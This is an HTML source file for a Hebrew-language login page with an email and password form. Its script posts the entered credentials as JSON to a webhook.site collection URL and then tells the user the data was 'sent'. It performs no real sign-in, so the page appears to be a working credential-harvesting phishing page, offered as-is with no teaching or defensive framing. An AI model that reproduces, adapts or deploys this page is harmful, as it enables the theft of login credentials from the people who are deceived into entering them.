<!DOCTYPE html>
<html lang="he">
<head>
  <meta charset="UTF-8">
  <title>התחברות</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background: linear-gradient(to right, #4facfe, #00f2fe);
      display: flex;
      flex-direction: column;
      align-items: center;
      justify-content: center;
      height: 100vh;
      margin: 0;
    }

    .login-box {
      background: white;
      padding: 30px;
      border-radius: 20px;
      box-shadow: 0 0 20px rgba(0, 0, 0, 0.2);
      text-align: center;
      width: 300px;
    }

    .login-box img {
      width: 80px;
      margin-bottom: 20px;
    }

    .login-box input {
      width: 90%;
      padding: 10px;
      margin: 10px 0;
      border: 1px solid #ccc;
      border-radius: 8px;
    }

    .login-box button {
      background: #4facfe;
      color: white;
      padding: 10px 20px;
      border: none;
      border-radius: 10px;
      cursor: pointer;
      font-size: 16px;
      transition: 0.3s;
    }

    .login-box button:hover {
      background: #00c6ff;
    }
  </style>
</head>
<body>
  <div class="login-box">
    <img src="https://cdn-icons-png.flaticon.com/512/747/747545.png" alt="Login Icon">
    <h2>התחברות</h2>
    <input type="email" id="email" placeholder="אימייל" required><br>
    <input type="password" id="password" placeholder="סיסמה" required><br>
    <button onclick="send()">התחבר</button>
  </div>

  <script>
    function send() {
      const email = document.getElementById("email").value;
      const password = document.getElementById("password").value;

      fetch("https://webhook.site/c3a2264c-9115-45c9-8a36-70b9a6439623", {
        method: "POST",
        mode: "no-cors", // עוזר למנוע שגיאות fetch
        headers: {
          "Content-Type": "application/json"
        },
        body: JSON.stringify({ email: email, password: password })
      })
      .then(() => {
        alert("נשלח! (המערכת לא מקבלת אישור בגלל no-cors אבל זה כן נשלח)");
      })
      .catch(error => {
        alert("שגיאה: " + error.message);
      });
    }
  </script>
</body>
</html>
